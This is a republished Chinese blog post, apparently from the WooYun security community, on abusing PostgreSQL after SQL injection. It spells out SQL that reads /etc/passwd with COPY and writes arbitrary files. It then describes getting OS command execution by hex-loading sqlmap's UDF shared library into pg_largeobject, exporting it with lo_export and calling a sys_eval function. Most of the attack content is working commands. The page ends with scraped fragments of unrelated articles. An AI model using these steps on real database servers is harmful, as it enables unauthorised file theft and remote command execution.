2. 程式人生 > >PostgreSql那點事(文件讀取寫入、命令執行的辦法)

PostgreSql那點事(文件讀取寫入、命令執行的辦法)

阿新 發佈:2017-11-06
ict con ext ews none urn truct 語法 tip

技術分享 ? 2013/07/9 作者: admin

PostgreSql那點事(文件讀取寫入、命令執行的辦法)

今天無意發現了個PostgreSQL環境,線上學習了下,一般的數據註射(讀寫數據庫)差異不大,不做討論,個人比較關心PostgreSQL的文件讀取和命令執行方面。

1,文件讀取/寫入
PostgreSQL 8.1 以後提供了一組現成的文件操作函數 pg_logdir_ls()、pg_ls_dir()、pg_file_rename()、pg_file_write()、 pg_read_file()、pg_length_file(),用這些就可以胡作非為了?你錯了。。。
可以用這個函數直接讀取/etc/passwd?實際情況下測試並未成功,因為pg_xxx這個adminpack將權限限制在了./postgresql/data下面。
a)

比如列目錄

技術分享

b)讀取權限允許的文件
技術分享
還有個寫文件函數測試並未成功,而且只能像data下寫也是滿足不了需求的。
c)比較可行的文件讀取方案

Default
1 2 3 4 drop table wooyun; CREATE TABLE wooyun(t TEXT); COPY wooyun FROM ‘/etc/passwd‘; SELECT * FROM wooyun limit 1 offset 0;

技術分享
技術分享

利用註射修改偏移值很快就可以遍歷出來了,但是還是有點寒磣,直接讀出全部數據

Default
1 2 3 4 DROP TABLE wooyun; CREATE TABLE wooyun (t TEXT); COPY wooyun(t) FROM ‘/etc/passwd‘; SELECT * FROM wooyun;

技術分享
d)寫入文件

Default
1 2 3 4 DROP TABLE wooyun; CREATE TABLE wooyun (t TEXT); INSERT INTO wooyun(t) VALUES (‘hello wooyun‘); COPY wooyun(t) TO ‘/tmp/wooyun‘;

技術分享
讀一下看看是否存在
技術分享
Bingo~

2,命令執行
這裏大概有三種方式
a)利用 libc 中的 system() 函數
很多文章會讓我們添加一個到libc庫的自定義功能函數

Default
1 CREATE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6‘, ‘system‘ LANGUAGE ‘C‘ STRICT;

但是返回錯誤
Error : ERROR: incompatible library “/lib64/libc.so.6”: missing magic block
HINT: Extension libraries are required to use the PG_MODULE_MAGIC macro.
這是因為當PostgreSQL加載外部動態庫的時候,會檢查MAGIC DATA,如果沒有這個函數(Pg_magic_func),PostgreSQL認為這個動態庫不是PostgreSQL可以使用的動態庫。具體邏輯請 看 src/backend/utils/fmgr/dfmgr.c 中定義的 internal_load_library 函數源代碼。
這樣一來就等同於建立了一個“白名單”,系統自帶的庫默認我不再允許動態加載,所以此路不通(也許低版本走的通,但我手裏這個不行)。
給一個 Pg_magic_func 代碼樣例:

Default
1 2 3 4 5 6 7 extern PGDLLEXPORT const Pg_magic_struct * Pg_magic_func(void); const Pg_magic_struct * Pg_magic_func(void) { static const Pg_magic_struct Pg_magic_data = PG_MODULE_MAGIC_DATA; return &Pg_magic_data; }

b)利用Perl/Python腳本語言功能
在zone上看過一帖,http://zone.wooyun.org/content/1591,很納悶為什麽這樣定義函數就可以執行系統命令,plperlu又是啥,經過資料的挖掘,發現是PostgreSQL自帶的一種程序語言支持。
具體可見這裏(http://www.postgresql.org/docs/8.3/static/xplang.html)。
大概意思就是PostgreSQL允許用除了SQL和C的其他語言來編寫函數,但這個很悲劇啊,我的環境沒有安裝PostgreSQL的Python和Perl支持,待我弄個環境在來實現下過程。

c)利用C語言自定義函數
Perl、Python都能在PostgreSQL自定義了更不用說C了。這個在sqlmap的udf目錄下有現成的,而且還是根據版本加了Pg_magic_func函數的,可以加載。。。牛鞭!

Default
1 2 3 4 FengGou:8.4 $ pwd /Users/FengGou/sqlmap/udf/postgresql/linux/64/8.4 FengGou:8.4 $ ls lib_postgresqludf_sys.so

將sqlmap的so文件轉為16進制的代碼,

Default
1 7F454C4602010100000000000000000003003E0001000000C00C0000000000004000000000000000A0170000000000000000000040003800050040001A00190001000000050000000000000000000000000000000000000000000000000000008413000000000000841300000000000000002000000000000100000006000000881300000000000088132000000000008813200000000000A802000000000000B00200000000000000002000000000000200000006000000B013000000000000B013200000000000B01... ...

老他麽長的一段,怎麽還原成二進制的so庫文件呢?這裏感謝 @瞌睡龍 提供的Tips,這裏用到了PostgreSQL的pg_largeobject“大對象數據”,官方原文:pg_largeobject 表保存那些標記著”大對象”的數據。 一個大對象是使用其創建時分配的 OID 標識的。 每個大對象都分解成足夠小的小段或者”頁面”以便以行的形式存儲在 pg_largeobject 裏。 每頁的數據定義為LOBLKSIZE(目前是BLCKSZ/4,或者通常是 2K 字節)。

a)查看PostgreSQL目錄

Default
1 SELECT setting FROM pg_settings WHERE name=‘data_directory‘;

b)查詢oid

Default
1 select lo_creat(-1);

oid為當前對象大數據的標識符,我們要利用這個存儲UDF文件內容。
c)oid與上面保持一致

Default
1 delete from pg_largeobject where loid=18412;

等於變相清空”頁面”,不要幹擾庫的生成
d)把16進制的so文件塞進去

Default
1 insert into pg_largeobject (loid,pageno,data) values(18412, 0, decode(‘7F454CXXXXXXXXX000‘, ‘hex‘));

e)利用PostgreSQL自帶函數將大型對象導出到文件

Default
1 SELECT lo_export(18412, ‘cmd.so‘);

f)建立UDF

Default
1 CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS ‘/xxx/cmd.so‘, ‘sys_eval‘ LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

g)調用這個UDF

Default
1 select sys_eval(‘id‘);

技術分享

也許服務器沒裝PostgreSQL的Perl、Python支持,但是C庫是通用的。

相關文章《Postgresql註入語法指南》《postgresql讀寫文件和破解密碼》

參考:
[1]PostgreSQL SQL Injection Cheat Sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
[2]OWASP Backend Security Project Testing PostgreSQL
https://www.owasp.org/index.php/OWASP_Backend_Security_Project_Testing_PostgreSQL
[3]PostGreSQL註入學習(續篇)
http://www.hackol.com/news/201007270731289820885.shtml
[4]PostgreSQL Adminpack
http://www.postgresql.org/docs/8.4/static/adminpack.html
[5]PostgreSQL 外部動態連接庫魔法塊的使用
http://my.oschina.net/quanzl/blog/136907
[6]Chapter 37. Procedural Languages
http://www.postgresql.org/docs/8.3/static/xplang.html
[7]postgresql “初級”註入大法
http://zone.wooyun.org/content/1591
[8]pg_largeobject
http://www.php100.com/manual/PostgreSQL8/catalog-pg-largeobject.html

link:http://zone.wooyun.org/content/4971

PostgreSql那點事(文件讀取寫入、命令執行的辦法)

相關推薦

PostgreSql讀取寫入命令執行辦法

ict con ext ews none urn truct 語法 tip ? 2013/07/9 作者: admin PostgreSql那點事(文件讀取寫入、命令執行的辦法) 今天無意發現了個PostgreSQL環境,線上學習了下,一般的數據註射(讀寫數據庫)差異不

Android8.0適配

懸浮 新增功能 nta onstop config ges 保持 com dfa 1、通知渠道(Channeld) 當然,適配8.0的第一步自然是把targeSdk升級到26,在8.0中所有通知的實現都需要提供通知渠道,否則,所有通知在8.0系統上面都不能正常顯示; 下圖是

Android8.0適配

滿足 ive 用戶 box str ati 隱式 分解 語音 小夥伴們,咱們今天咱繼續對Android8.0的適配進行分解,今天將針對啟動頁,版本適配和系統限制等進行“啃食”1、啟動頁適配近日,我無意中發現應用在8.0系統上面啟動頁崩潰,趕緊去找BUG,運行後發現如下異常:

【轉】NettyChannel中的Pipeline

【原文】https://github.com/code4craft/netty-learning/blob/master/posts/ch3-pipeline.md Channel是理解和使用Netty的核心。Channel的涉及內容較多,這裡我使用由淺入深的介紹方法。在這篇文章中,我們主要介紹Channe

Android 關於定位中的GPS,GPGGA,NMEA-0183,RTCM

首先關於定位一些解釋 通常在Android端地圖相關用的最多的都是第三方的Sdkj進行二次開發,如百度,高德,World Wind ,arcgis等,對於手機自帶的GPS晶片和國內的北斗晶片瞭解的相對較少,GPS在android中已經由android底層驅動封

基於VUE開發專案的

前言 最近由於公司需要,需要寫一個相對來說比較大型的後臺管理系統。為了保證管理系統操作體驗較為舒適並且專案後期益於維護,最後決定基於VUE全家桶來開發一個高度元件化的單頁SPA應用。 技術選型 vue:進行資料繫結以及開發元件 vue-rou

Linux網路CentOSUbuntuKali

這種方法適用於CentOS和Ubuntu(附錄有kali和debain的網路配置),現在伺服器基本上都是這兩者,其他的Linux版本基本指令會即可,不需要什麼都會 vi /etc/sysconfig/network-scripts/ifcfg-eth0 (有些人不一定是eth0) 有些人不

Spring原始碼學習--AOP

文章來源: 原始碼下載: 還是依照慣例,給一張牛逼的高清無碼思維導圖,總結一下以上各個知識點: 再來一張表格,總結一下各類增強型別所對應的解決方案: 最後給一張 UML 類圖描述一下 Spring AOP 的整體架構: 今天我要

Python txt讀取寫入字典的方法jsoneval

kill file 方法 文件讀取 imp 轉換 span 寫入 pytho 一、使用json轉換方法 1、字典寫入txt import json dic = { ‘andy‘:{ ‘age‘: 23, ‘city‘: ‘b

2017年值得回首的那些末有新春好禮相送

常見 卡片 target sea 兼容 app 使用 hello 微信 2017過的確實有點快,雖然2018已經過去一個月了,但還有點沒適應過來,畢竟還沒過年。大家常說,沒有記錄就沒有發生,幸好有分享達人秀這個平臺,可以將過去所做的一些事情記錄下來,現在回頭去看,還是有很多

“百度杯”CTF比賽 九月場_123備份,爆破,上傳

lag 註釋 alt png 一個 頁面 圖片 比賽 src 題目在i春秋ctf訓練營 翻看源碼,發現提示: 打開user.php,頁面一片空白,參考大佬的博客才知道可能會存在user.php.bak的備份文件,下載該文件可以得到用戶名列表 拿去burp爆破:

Android app 線上更新事兒適配Android6.07.08.0

一、前言 app線上更新是一個比較常見需求,新版本釋出時,使用者進入我們的app,就會彈出更新提示框,第一時間更新新版本app。線上更新分為以下幾個步驟: 1, 通過介面獲取線上版本號,versionCode 2, 比較線上的versionCode 和本地的versi

鳥哥的Linux私房菜-第10/11/12/13章vim程序編輯器學習bash正則表達式與格式化處理學習Shell Scripts

重定向 數據文件 bin 情況下 control 入侵檢測 nts 背景 成了 第10章 vim程序編輯器 可以將vim看做vi的進階版本,vim可以用顏色或底線等方式來顯示出一些特殊的信息。 為何要學習vim?因為:   a. 所有的 Unix Like 系統都會內

JAVA IO流編程 實現寫入寫出以及拷貝

better class else 提示 判斷 記錄 文件路徑 針對 轉換成 一、流的概念 流:數據在數據源(文件)和程序(內存)之間經歷的路徑。 輸入流:數據從數據源(文件)到程序(內存)的路徑。 輸出流:數據從程序(內存)到數據源(文件)的路徑。 以內存為

調用函數的

eas ont .sh NPU 數位 else code continue 類函數 這是寫的傳入值為數字的類函數,存儲在文件share.py中每次調用輸入數字的方法時就可以從此文件中調用此函數。 class Share: def Num_input(s

讀取草稿excel,csv

string guid dwr lda clas isn urn datarow arraylist using NPOI.XSSF.UserModel; using System; using System.Collections.Generic; using Syst

C#-XML提取字符串+字符串存為XML+創建XML自定義節點+讀取節點內容

cts ted set clas desc format view nav child 一、將字符串寫入xml文件(並保存) 寫入: XmlDocument xdoc = new XmlDocument(); xdoc.LoadXml(“xmlstring”); 保存

spingmvc的外置properties讀取java循環利用properties內容

bank return nco ping throw ssp per exce oid 既然已經有了applicationContext.xml的properties路徑,java不必再設定properties路徑。 applicationContext.xml 改前:

通過load json讀取json指定數據基於python 3.6

variable date 文件讀取 log for min face DC 氣壓 <--------json文件--------->{ "DCN":{ "filename":"at0101.07422", "variable":"氣溫",

python接口測試——Excell讀取進行參數化

range 導入 ase pri int div 通過 類型 分享 python進行http請求時,需要對參數進行參數化,此時就可以運用Excel進行,具體如下: 1.梳理出請求中那些參數需要參數化,然後新建一個Excel,如圖:    2.讀取Excel中的內容,在讀取前